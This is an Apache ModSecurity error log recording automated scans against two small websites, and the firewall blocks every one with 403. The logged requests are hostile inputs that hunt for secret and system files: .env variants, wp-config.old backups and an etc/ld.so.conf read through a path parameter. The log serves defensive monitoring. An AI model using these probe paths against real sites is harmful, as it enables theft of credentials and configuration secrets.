[Mon May 11 11:23:25.633103 2026] [security2:error] [pid 1256241:tid 1256252] [client 185.177.72.9:39522] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /modules/.env.live.stage"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/modules/.env.live.stage"] [unique_id "agGgDZkIEwRJMyDaV55FPwAAAUY"]
[Mon May 11 11:23:25.633579 2026] [security2:error] [pid 1256241:tid 1256252] [client 185.177.72.9:39522] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/modules/.env.live.stage"] [unique_id "agGgDZkIEwRJMyDaV55FPwAAAUY"]
[Mon May 11 11:23:26.831326 2026] [security2:error] [pid 1256241:tid 1256252] [client 185.177.72.9:39522] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGgDZkIEwRJMyDaV55FPwAAAUY"]
[Mon May 11 11:23:34.491963 2026] [security2:error] [pid 1254133:tid 1254159] [client 216.73.216.110:36274] ModSecurity: Warning. Matched phrase "etc/ld.so.conf" at ARGS:path. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/ld.so.conf found within ARGS:path: /etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agGgFhjZymfuKpjWXehzZwAAANc"]
[Mon May 11 11:23:34.492433 2026] [security2:error] [pid 1254133:tid 1254159] [client 216.73.216.110:36274] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agGgFhjZymfuKpjWXehzZwAAANc"]
[Mon May 11 11:23:34.592867 2026] [security2:error] [pid 1254133:tid 1254159] [client 216.73.216.110:36274] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGgFhjZymfuKpjWXehzZwAAANc"]
[Mon May 11 11:23:41.867969 2026] [security2:error] [pid 1254179:tid 1254194] [client 185.177.72.9:36724] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /monitor/.env.dist_old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/monitor/.env.dist_old"] [unique_id "agGgHWS6k_SCYd1AVZqmCAAAAQ0"]
[Mon May 11 11:23:41.868335 2026] [security2:error] [pid 1254179:tid 1254194] [client 185.177.72.9:36724] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/monitor/.env.dist_old"] [unique_id "agGgHWS6k_SCYd1AVZqmCAAAAQ0"]
[Mon May 11 11:23:42.060468 2026] [authz_core:error] [pid 1254242:tid 1254264] [client 216.73.216.110:42402] AH01630: client denied by server configuration: /home/missmand/public_html/vendor/gregwar/captcha/error_log
[Mon May 11 11:23:43.054831 2026] [security2:error] [pid 1254179:tid 1254194] [client 185.177.72.9:36724] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGgHWS6k_SCYd1AVZqmCAAAAQ0"]
[Mon May 11 11:23:43.082558 2026] [security2:error] [pid 1254328:tid 1254331] [client 185.177.72.9:36728] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /monitor/.env.dist_old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/monitor/.env.dist_old"] [unique_id "agGgH0Rdw2n9wv6Ai4__BgAAAIA"]
[Mon May 11 11:23:43.082801 2026] [security2:error] [pid 1254328:tid 1254331] [client 185.177.72.9:36728] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/monitor/.env.dist_old"] [unique_id "agGgH0Rdw2n9wv6Ai4__BgAAAIA"]
[Mon May 11 11:23:44.369152 2026] [security2:error] [pid 1254328:tid 1254331] [client 185.177.72.9:36728] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGgH0Rdw2n9wv6Ai4__BgAAAIA"]
[Mon May 11 11:23:53.101882 2026] [security2:error] [pid 1256241:tid 1256249] [client 185.177.72.9:55502] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /netlify/.env.local.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/netlify/.env.local.example"] [unique_id "agGgKZkIEwRJMyDaV55FYQAAAUM"]
[Mon May 11 11:23:53.102225 2026] [security2:error] [pid 1256241:tid 1256249] [client 185.177.72.9:55502] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/netlify/.env.local.example"] [unique_id "agGgKZkIEwRJMyDaV55FYQAAAUM"]
[Mon May 11 11:23:54.269394 2026] [security2:error] [pid 1256241:tid 1256249] [client 185.177.72.9:55502] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGgKZkIEwRJMyDaV55FYQAAAUM"]
[Mon May 11 11:23:54.295589 2026] [security2:error] [pid 1254212:tid 1254233] [client 185.177.72.9:7622] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /netlify/.env.local.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/netlify/.env.local.example"] [unique_id "agGgKkYQeUtAPynIs6xQAAAAABM"]
[Mon May 11 11:23:54.296002 2026] [security2:error] [pid 1254212:tid 1254233] [client 185.177.72.9:7622] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/netlify/.env.local.example"] [unique_id "agGgKkYQeUtAPynIs6xQAAAAABM"]
[Mon May 11 11:23:55.519121 2026] [security2:error] [pid 1254212:tid 1254233] [client 185.177.72.9:7622] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGgKkYQeUtAPynIs6xQAAAAABM"]
[Mon May 11 11:23:55.544689 2026] [security2:error] [pid 1254242:tid 1254255] [client 185.177.72.9:7638] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /netlify/.env.local.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/netlify/.env.local.prod"] [unique_id "agGgK74KNmD_mZ_vlf8wXgAAAEo"]
[Mon May 11 11:23:55.545064 2026] [security2:error] [pid 1254242:tid 1254255] [client 185.177.72.9:7638] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/netlify/.env.local.prod"] [unique_id "agGgK74KNmD_mZ_vlf8wXgAAAEo"]
[Mon May 11 11:23:56.706633 2026] [security2:error] [pid 1254242:tid 1254255] [client 185.177.72.9:7638] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGgK74KNmD_mZ_vlf8wXgAAAEo"]
[Mon May 11 11:23:56.737423 2026] [security2:error] [pid 1254242:tid 1254251] [client 185.177.72.9:7646] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /netlify/.env.local.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/netlify/.env.local.prod"] [unique_id "agGgLL4KNmD_mZ_vlf8wXwAAAEU"]
[Mon May 11 11:23:56.740958 2026] [security2:error] [pid 1254242:tid 1254251] [client 185.177.72.9:7646] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/netlify/.env.local.prod"] [unique_id "agGgLL4KNmD_mZ_vlf8wXwAAAEU"]
[Mon May 11 11:23:57.931650 2026] [security2:error] [pid 1254242:tid 1254251] [client 185.177.72.9:7646] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGgLL4KNmD_mZ_vlf8wXwAAAEU"]
[Mon May 11 11:24:10.080347 2026] [security2:error] [pid 1254328:tid 1254351] [client 185.177.72.9:9062] ModSecurity: Warning. Matched phrase "wp-config.old" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.old found within REQUEST_FILENAME: /next/wp-config.old.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/next/wp-config.old.local"] [unique_id "agGgOkRdw2n9wv6Ai4__IgAAAJU"]
[Mon May 11 11:24:10.083768 2026] [security2:error] [pid 1254328:tid 1254351] [client 185.177.72.9:9062] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/next/wp-config.old.local"] [unique_id "agGgOkRdw2n9wv6Ai4__IgAAAJU"]
[Mon May 11 11:24:12.292333 2026] [security2:error] [pid 1254328:tid 1254351] [client 185.177.72.9:9062] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGgOkRdw2n9wv6Ai4__IgAAAJU"]
[Mon May 11 11:24:12.318227 2026] [security2:error] [pid 1256241:tid 1256251] [client 185.177.72.9:9078] ModSecurity: Warning. Matched phrase "wp-config.old" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.old found within REQUEST_FILENAME: /next/wp-config.old.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/next/wp-config.old.local"] [unique_id "agGgPJkIEwRJMyDaV55FaAAAAUU"]
[Mon May 11 11:24:12.318426 2026] [security2:error] [pid 1256241:tid 1256251] [client 185.177.72.9:9078] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/next/wp-config.old.local"] [unique_id "agGgPJkIEwRJMyDaV55FaAAAAUU"]
[Mon May 11 11:24:13.527569 2026] [security2:error] [pid 1256241:tid 1256251] [client 185.177.72.9:9078] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGgPJkIEwRJMyDaV55FaAAAAUU"]
[Mon May 11 11:24:13.554095 2026] [security2:error] [pid 1254179:tid 1254187] [client 185.177.72.9:4090] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /node/.env.live.stage"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/node/.env.live.stage"] [unique_id "agGgPWS6k_SCYd1AVZqmOQAAAQY"]
[Mon May 11 11:24:13.554567 2026] [security2:error] [pid 1254179:tid 1254187] [client 185.177.72.9:4090] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/node/.env.live.stage"] [unique_id "agGgPWS6k_SCYd1AVZqmOQAAAQY"]
[Mon May 11 11:24:14.707875 2026] [security2:error] [pid 1254179:tid 1254187] [client 185.177.72.9:4090] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGgPWS6k_SCYd1AVZqmOQAAAQY"]
[Mon May 11 11:24:14.734770 2026] [security2:error] [pid 1254212:tid 1254220] [client 185.177.72.9:4098] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /node/.env.live.stage"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/node/.env.live.stage"] [unique_id "agGgPkYQeUtAPynIs6xQCAAAAAY"]
[Mon May 11 11:24:14.735150 2026] [security2:error] [pid 1254212:tid 1254220] [client 185.177.72.9:4098] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/node/.env.live.stage"] [unique_id "agGgPkYQeUtAPynIs6xQCAAAAAY"]
[Mon May 11 11:24:15.945881 2026] [security2:error] [pid 1254212:tid 1254220] [client 185.177.72.9:4098] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGgPkYQeUtAPynIs6xQCAAAAAY"]
[Mon May 11 11:24:15.972476 2026] [security2:error] [pid 1254212:tid 1254228] [client 185.177.72.9:4112] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /node/.env.save_old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/node/.env.save_old"] [unique_id "agGgP0YQeUtAPynIs6xQCwAAAA4"]
[Mon May 11 11:24:15.972710 2026] [security2:error] [pid 1254212:tid 1254228] [client 185.177.72.9:4112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/node/.env.save_old"] [unique_id "agGgP0YQeUtAPynIs6xQCwAAAA4"]
